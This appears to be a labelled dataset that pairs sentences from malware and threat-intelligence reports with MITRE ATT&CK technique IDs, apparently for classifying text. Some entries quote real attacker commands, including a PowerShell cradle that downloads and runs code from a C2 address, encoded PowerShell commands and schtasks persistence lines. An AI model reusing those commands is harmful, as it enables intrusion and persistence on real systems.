{"text1":"This links the previous samples with this unique username","labels":"['T1033']"}
|
|
{"text1":"Note that the username could be a small joke on the attackers\u2019 part regarding the attribution to FIN7","labels":"['T1033']"}
|
|
{"text1":"The magic value 0xFEEDFACF that belongs to Mach-O Executable (64 bit) Methods GET_LAUNCHNAME and GET_LABELNAME will return the hardcoded name of the property list \u201c.plist\u201d for the root user (com.apple.screen.assistantd.plist) and for the regular user (com.apple.spell.agent.plist)","labels":"['T1033']"}
|
|
{"text1":"The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\\Users\\<username>\\AppData\\Roaming\\Out.jpg","labels":"['T1033']"}
|
|
{"text1":"code(2343)\", MsgBoxStyle.Critical, null); The dropper then writes the content of the payload which resides as plaintext in a resource within the .NET assembly to C:\\Users\\<username>\\AppData\\Local\\Temp\\SystemDiskClean.ps1","labels":"['T1033']"}
|
|
{"text1":"File is dropped to C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft Network\\microsoft_network\\1.0.0.0\\microsoft_network.exe","labels":"['T1033']"}
|
|
{"text1":"File starts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe","labels":"['T1033']"}
|
|
{"text1":"For example, in the previous variant of BADNEWS, the victim\u2019s unique identifier was stored under a variable named \u2018uid\u2019, the username was stored in a variable named \u2018u\u2019, etc","labels":"['T1033']"}
|
|
{"text1":"Unique User-Agents The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign","labels":"['T1033']"}
|
|
{"text1":"(Source: Dell SecureWorks) Further research revealed additional tools containing the same username (see Figure 21)","labels":"['T1033']"}
|
|
{"text1":"The SP variable is a string containing the victim's username","labels":"['T1033']"}
|
|
{"text1":"It also attempts to issue the following SQL query on the \u201csignons.sqlite\u201d file: \u201cSELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins WHERE timePasswordChanged\/1000 BETWEEN ? AND ?\u201d 117 ftpUpload Uses FTPManager:uploadFile method and a supplied server name, username and password","labels":"['T1033']"}
|
|
{"text1":"The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com.","labels":"['T1033']"}
|
|
{"text1":"Command ID 17 indexes to a function that collects the system information and sends it to the C2 server.","labels":"['T1033']"}
|
|
{"text1":"According to the server\u2019s code, the default command that it would issue to newly infected systems was a batch script contained in a file named 0000000000.bat","labels":"['T1059', 'T1064']"}
|
|
{"text1":"After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files: MD5 Filename d76261ba3b624933a6ebb5dd73758db4 WmiApCom 79b68cdd0044edd4fbf8067b22878644 WmiApCom.bat The \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Attackers using Comnie are leveraging malicious macros that initially hide decoy documents and show them when the victim enables macros","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL)","labels":"['T1059', 'T1064']"}
|
|
{"text1":"While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info","labels":"['T1059', 'T1064']"}
|
|
{"text1":"VBScript #1 The dropped script \u201c58d2a83f7778d5.36783181.vbs\u201d acts as a launcher","labels":"['T1059', 'T1064']"}
|
|
{"text1":"For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The following are the three files: Defender.sct \u2013 The malicious JavaScript based scriptlet file","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources","labels":"['T1059', 'T1064']"}
|
|
{"text1":"While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe that this group uses the script to deliver Metasploit\u2019s Meterpreter as a potential payload as well","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Character Description 0 File contains batch commands, it executes the batch commands 1 Rename the temporary file as .ps1 extension 2 Rename the temporary file as .vbs extension Table 2: BONDUPDATER Actions Figure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation","labels":"['T1059', 'T1064']"}
|
|
{"text1":"To run persistently on the system, the Trojan will first create a VBScript file: SpecialFolder.CommonApplicationData\\srvResesponded.vbs that contains: CreateObject(\u201cWScript.Shell\u201d).Run(\u201c%app%\u201d) The Trojan replaces the %app% string in the above VBScript with the path to its executable","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The group often uses the trial version of Cobalt Strike, a publicly available commercial software for \u201cAdversary Simulations and Red Team Operations.\u201d Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, \u201ca PowerShell and Python post-exploitation agent.\u201d For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary shellcode","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1","labels":"['T1059', 'T1064']"}
|
|
{"text1":"For that we can use a Python script, included in Appendix B \u2013 Python Scripts","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Essentially, we are discussing ongoing activity revolving around several malware families: KopiLuwak and IcedCoffee Carbon Mosquito WhiteBear Technical Rattle Turla\u2019s Shifting to Scripting KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper\/installation operations as well as for implementing complete backdoors","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The image is downloaded directly, and the shellcode is loaded and executed in memory","labels":"['T1059', 'T1064']"}
|
|
{"text1":"(On the left is NavRAT, and on the right is the shellcode of ROKRAT): We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Figure 3: Script code embedded in 29[.]html used to download and run Revenge RAT The script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3), the only difference being the absence of a sleep command and the usage of the \u201cforfiles\u201d utility","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS).","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach.","labels":"['T1059', 'T1064']"}
|
|
{"text1":"The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell.","labels":"['T1059', 'T1064']"}
|
|
{"text1":"Screenshot provided in leak showing administrative panel for hosting provider Berbid Server The screenshot showed the administrative panel for a VPS account on DeltaHost with four different virtual servers, as seen in Figure 20","labels":"['T1113']"}
|
|
{"text1":"Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018","labels":"['T1113']"}
|
|
{"text1":"This screenshot is via an RDP session as indicated by the tab located at the top of the screen and is located at 164.132.67[.]216 which is hosted by OVH","labels":"['T1113']"}
|
|
{"text1":"The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible","labels":"['T1113']"}
|
|
{"text1":"Malware features Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands","labels":"['T1113']"}
|
|
{"text1":"SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path \u201c\/FeedBack.php\u201d","labels":"['T1113']"}
|
|
{"text1":"While sending to the C2 server, the data is formatted as follows: @{SYSINFO = $get.ToString(); ACTION = \"REGISTER\";} Ability to take screenshots","labels":"['T1113']"}
|
|
{"text1":"The \u201cscreenshot\u201d command takes a screenshot that is saved as a .PNG file in \u201cProgramData\u201d","labels":"['T1113']"}
|
|
{"text1":"The screen capture below shows the decryption function. It then calls the StartAndPatchRegAsm function. This function tries to find the original Microsoft RegAsm executable path","labels":"['T1113']"}
|
|
{"text1":"Figure 3: Screen capture of the downloader executed on OS X El Capitan","labels":"['T1113']"}
|
|
{"text1":"Interestingly, we\u2019ve seen recent samples embedding decoy documents that are screenshots of botnet C&C panels or dumps of credit card numbers","labels":"['T1113']"}
|
|
{"text1":"POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued","labels":"['T1113']"}
|
|
{"text1":"The command handle looks for the following command strings in Table 3: Command Description $fileDownload Uploads the contents of a specified file to C2 $importModule Adds a specified PowerShell module to the current script $screenshot Executes the contents of the command, which should be the string \u2018$screenshot\u2019","labels":"['T1113']"}
|
|
{"text1":"23 Take screenshot, temporarily store it as TPX499.dat, and upload it to the C2","labels":"['T1113']"}
|
|
{"text1":"SpyNote RAT captured the device\u2019s screen activities along with audio using the MediaProjectionCallback functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named \"video.mp4\" as shown in the following screenshot: Figure 5: Output File SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in screenshot below: Figure 6: Reading SMS messages Stealing contacts The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the spyware","labels":"['T1113']"}
|
|
{"text1":"[Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC In addition to a standard malware analysis blog post, I\u2019d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future","labels":"['T1113']"}
|
|
{"text1":"Returns the screenshot to the C2 via: <img src=\u2019data:image\/jpeg;base64,[base64 of screenshot]\u2019 width=800 height=500 \/><br> 111 startTakeScreenShot Creates a thread to take a screenshot at a set interval (default: every 10 seconds)","labels":"['T1113']"}
|
|
{"text1":"This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine","labels":"['T1070']"}
|
|
{"text1":"This is a guest post by independent security researcher James Quinn. This will be Part 1 of a series titled Reversing Gh0stRAT Variants. As 2018 drew to a close and 2019 took over, I began to see a different behavior from SMB malware authors. Instead of massive, multi-staged cryptocurrency miners, I began to see more small, covert RATs serving as partial stage1\u2019s. Of these samples, there was one specific sample that stood out to me. A Gh0stRAT variant, this sample not only changed the Gh0stRAT header from \u201cGh0st\u201d to \u201cnbLGX\u201d, it also hid its traffic with an encryption algorithm over the entire TCP segment, in addition to the standard Zlib compression on the Gh0stRAT data. Some key functionality is below: Can download more malware Offline Keylogger Cleans Event logs","labels":"['T1070']"}
|
|
{"text1":"The same situation applies to authentication by key pair \u2013 the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used","labels":"['T1056']"}
|
|
{"text1":"The keylogger then records keystrokes in encrypted files, for example: thumbcache_96.dbx","labels":"['T1056']"}
|
|
{"text1":"NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers","labels":"['T1056']"}
|
|
{"text1":"It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems","labels":"['T1056']"}
|
|
{"text1":"Deobfuscated, we can see it is the HawkEye Keylogger \u2014 Reborn v9, Version=9.0.1.6","labels":"['T1056']"}
|
|
{"text1":"8 Upload the TPX498.dat file, which contains the list of collected keystrokes","labels":"['T1056']"}
|
|
{"text1":"63 64 ku64.dll ku32.dll Keylogger & clipboard monitor","labels":"['T1056']"}
|
|
{"text1":"keylogger) may be missing for these platforms","labels":"['T1056']"}
|
|
{"text1":"However, the campaign that the PDC has recently observed has been delivering this keylogger exclusively","labels":"['T1056']"}
|
|
{"text1":"There does appear to be function names however, including PeekMessageA, which has been previously observed in other keylogging malware","labels":"['T1056']"}
|
|
{"text1":"Keylogging Functionality XAgent also has a keylogger functionality that allows the threat actors to steal credentials as the user types them","labels":"['T1056']"}
|
|
{"text1":"This callback function will call a function named pressedKeyWithKeyCode, which is responsible for logging the keystrokes","labels":"['T1056']"}
|
|
{"text1":"Figure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks Superficially, we can immediately see the images are quite similar, but with some glaring differences","labels":"['T1574.002']"}
|
|
{"text1":"The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past","labels":"['T1574.002']"}
|
|
{"text1":"DLL side loading is often used to maintain persistence on the compromised system","labels":"['T1574.002']"}
|
|
{"text1":"Note: DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors","labels":"['T1574.002']"}
|
|
{"text1":"Send exfiltrated data taskkill.exe Ends working cycle of modules Persistence Persistence modules are based on scheduled tasks and system registry","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"For newer operating systems, events.exe creates task.xml as follows: Then it creates a Windows scheduled task using the following command: schtasks.exe \/create \/TN \\\"Events\\\\CacheTask_<user_name_here>\" \/XML \\\"<event_cache_dir_path>t \/F\" At the system registry level, modules achieve persistence by adding themselves into the key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit when it finds possible add values to the Winlogon subkey, and in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"After execution of every task, the malware sleeps for one minute before executing the next task","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The main similarities include the use of a scheduled task to persistently execute on the system, as well as the same general process to communicate with its C2 server","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The decoded string from the Sch resource is: SchTasks \/Create \/SC MINUTE \/MO 3 \/TN \u201c%n%\u201d \/TR \u201cwscript %path%\u201d \/f The decoded string from the VBS resource is: CreateObject(\u201cWScript.Shell\u201d).Run(\u201c%app%\u201d) The %n% string in the schtasks command above will be replaced with the GUID saved to GDI.bin","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"A scheduled task is also generated to maintain persistence of the payload","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"Office365DCOMCheck or SystemDiskClean) as the name for the scheduled task to maintain persistence on the victim host","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The malware component, test.exe, uses the Windows command \"cmd.exe\" \/C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task: schtasks \/create \/tn \"mysc\" \/tr C:\\Users\\Public\\test.exe \/sc ONLOGON \/ru \"System\" When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"Another batch script run by a scheduled task renames the archives on the file server (see Figure 15)","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The spreadsheet also creates a scheduled task named \"windows update check\" that runs the file C:\\Users\\<user_name>\\.templates\\System Manager.exe every minute.","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"When the trojan starts up it will attempt to install a scheduled task with the name of \u201cJava Maintenance64\u201d to keep itself running.","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The campaigns maintain persistence on machines by creating two daily scheduled task entries.","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"The script writes files to the path % appdata %\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily.","labels":"['T1053', 'T1053.005']"}
|
|
{"text1":"On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself","labels":"['T1598.003']"}
|
|
{"text1":"These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files","labels":"['T1598.003']"}
|
|
{"text1":"The first link was labeled as \"Comparison of Major Tasks in '16 & '17\" and the second link was identified as \"Comparison between '16 & '17\". Upon opening these links the user was presented with a further decoy Hangul document","labels":"['T1598.003']"}
|
|
{"text1":"It is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery mechanism","labels":"['T1598.003']"}
|
|
{"text1":"email with an embedded tracking link","labels":"['T1598.003']"}
|
|
{"text1":"A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk","labels":"['T1027.001']"}
|
|
{"text1":"Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information: netstat -ano > %TEMP%\\info.dat\nipconfig \/all >> %TEMP%\\info.dat\nroute PRINT >> %TEMP%\\info.dat\nnet view >> %TEMP%\\info.dat\ntasklist >> %TEMP%\\info.dat\nnet user >> %TEMP%\\info.dat\nnet start >> %TEMP%\\info.dat This script is written to a temporary file prior to being executed","labels":"['T1007']"}
|
|
{"text1":"The final part of the VBA script changes the properties of these two files, setting their attributes to Hidden","labels":"['T1564.001']"}
|
|
{"text1":"The locations: For root user path: \/Library\/CoreMediaIO\/Plug-Ins\/FCP-DAL\/iOSScreenCapture.plugin\/Contents\/Resources\/ processname: screenassistantd For regular user path: ~\/Library\/Spelling\/ processname: spellagentd Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file","labels":"['T1564.001']"}
|
|
{"text1":"This field contains a URL that the Trojan will use to upload the contents of the <process ID of Trojan>.txt file, which will be structured as <process ID of Trojan>.<C2 domain> where the process ID is encoded with the same character substitution function as seen previously in Table 4","labels":"['T1057']"}
|
|
{"text1":"The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes","labels":"['T1057']"}
|
|
{"text1":"Gather domain and account names based on all running processes Gathering account information from running processes","labels":"['T1057']"}
|
|
{"text1":"Figure 2: Process chain for the first part of the campaign Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it","labels":"['T1057']"}
|
|
{"text1":"It searches the active process list for the systemd process","labels":"['T1057']"}
|
|
{"text1":"Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted","labels":"['T1057']"}
|
|
{"text1":"This directory will also contain the process id of the running malware in process.id and a \u201cbuild name\u201d (as it is called by the author) in build.id","labels":"['T1057']"}
|
|
{"text1":"Enumerates running processes for \u201cWireshark\u201d and \u201cSysinternals\u201d","labels":"['T1057']"}
|
|
{"text1":"What does the Poseidon Group do? What happens after a target machine is infected? Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services","labels":"['T1057']"}
|
|
{"text1":"78 runin.bin List of processes names and associated plugins should be run inside these processes","labels":"['T1057']"}
|
|
{"text1":"The command does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel in the case of this \u201c.xlam\u201d file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher","labels":"['T1057']"}
|
|
{"text1":"While it includes multiple ways to find Explorer, the preferred method is to get the process id from the current desktop window.","labels":"['T1057']"}
|
|
{"text1":"As part of the anti-debugging or anti-monitoring techniques, ShellTea iterates over all the running processes, applies CRC32 on each process name (after converting the string to capital letters), and then compares the value against a predefined set of CRCs.","labels":"['T1057']"}
|
|
{"text1":"lists the running processes","labels":"['T1057']"}
|
|
{"text1":"The Trojan will then use the following regular expression to check the HTTP response to the content upload request for the file identifier value: \\\u201did\\\u201d:(.*) The Trojan will use this file identifier value to monitor for changes made to the file by the actor by checking for changes to the modification time of the <process ID of Trojan>.txt file","labels":"['T1070.006']"}
|
|
{"text1":"The Trojan uses the access token to write the string above to the first file uploaded to Google drive whose filename is <process ID of Trojan>.txt","labels":"['T1134']"}
|
|
{"text1":"The tokens for each platform are hardcoded within the sample: November 2016 to January 2017: \"Evil New Year\" Campaign In the early part of 2017, Group123 started the \"Evil New Year\" campaign","labels":"['T1134']"}
|
|
{"text1":"Figure\u00a06 Relational diagram of artifacts\u00a0 We created a timeline of the activity based off the data we collected, and found that the attack dates were tightly clustered into two waves in mid- to late-October and in mid-November as we see in Figure 7 using the timestamps from Table 3","labels":"['T1562.001']"}
|
|
{"text1":"Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry: DisableAttachmentsInPV DisableInternetFilesInPV DisableUnsafeLocationsInPV Figure 15: Disabling Microsoft Office Protected View Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16","labels":"['T1562.001']"}
|
|
{"text1":"From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool \u201cDNSMessenger\u201d When these points are considered together in conjunction with the significant difference in targeting they make a strong case for classifying this activity as distinct from FIN7 activity","labels":"['T1562.001']"}
|
|
{"text1":"SHA256 Compiled C2 account POP3S Account SMTPS Accounts 861b6bc1f9.","labels":"['T1087']"}
|
|
{"text1":"Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths","labels":"['T1087']"}
|
|
{"text1":"This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data","labels":"['T1087']"}
|
|
{"text1":"With these outputs, FIN6 was able to identify user accounts that could access additional hosts in the domain","labels":"['T1087']"}
|
|
{"text1":"The PowerShell script collects all possible information on the user and the network, including snapshots, computer and user names, emails from registry, tasks in task scheduler, system information, AVs registered in the system, privileges, domain and workgroup information","labels":"['T1087']"}
|
|
{"text1":"Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Mandiant initially identified an early variant of the POSHSPY backdoor deployed as PowerShell scripts during an incident response engagement in 2015","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the \u201cCommandLineTemplate.\u201d Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"However, in this new variant, all the DNS activity is initiated and executed solely from memory \u2013 unlike previous attacks which used PowerShell commands","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The PowerShell script executes a compressed first stage PowerShell child process, which then performs a second stage PowerShell process","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker\u2019s server","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"(For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim\u2019s system once the PowerShell implant is executed","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line: powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\\\ProgramData\\\\WindowsDefender.ini) The rest of the malicious activities are performed by the PowerShell Script","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"PowerShell File Analysis The PowerShell script employs several layers of obfuscation to hide its actual functionality","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Figure 11: PowerShell script is XOR encoded using a single byte key After deobfuscating the contents of the PowerShell Script, we can divide it into three sections","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:powershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQQBHAGsAQQBiAGcAQgAwAEEARQAwAEEAWQBRAEIAdQBBAEcARQBBAFoAdwBCAGwAQQBIAEkAQQBYAFEAQQA2AEEARABvAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBRAHcAQgBsAEEASABJAEEAZABBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEARgBZAEEAWQBRAEIAcwBBAEcAawBBAFoAQQBCAGgAQQBIAF..snip..As you can see, the C2 server responds with a PowerShell command that will run on the system","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Upon execution in a vulnerable environment, the PowerShell based payload takes over","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The PowerShell script is responsible for downloading the final payload from C2 server to execute it","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS)","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities.\u00a0 hUpdateCheckers.ps1 (POWRUNER) The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) \u00a0contains the following formula that Excel will save to the \u201cA0\u201d cell in the worksheet: The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp:\/\/micrrosoft[.]net\/winupdate.ps1","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The decompressed PowerShell payload has some similarities to the PowerShell Empire agent, such as the use of a jitter value and commands referred to by job ID, but we do not have conclusive evidence that the author of this tool used Empire as a basis for their tool","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"It will run the newly downloaded PowerShell script by running the following command via cmd \/c: wscript.exe \"Office365DCOMCheck.vbs\" \"PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -NoProfile <path to Office365DCOMCheck.ps1 script>\" The payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The following shows this unused command, which exposed an additional server within Sofacy\u2019s infrastructure would download and execute an encoded PowerShell script from 92.114.92[.]102: C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -Whidden $e=(New-ObjectSystem.Net.webClient).downloadString('hxxp:\/\/92.114.92[.]102:80\/d');powershell -enc $e # The unused command above appears to be related to previous attacks, specifically attacks that occurred in November 2017 as discussed by McAfee and ESET","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"Then, it will launch Dec.exe using PowerShell with the command \u201c cmd.exe \/c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized \u201d.","labels":"['T1546.013', 'T1059.001']"}
|
|
{"text1":"The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell","labels":"['T1546.013', 'T1059.001']"}
|
|
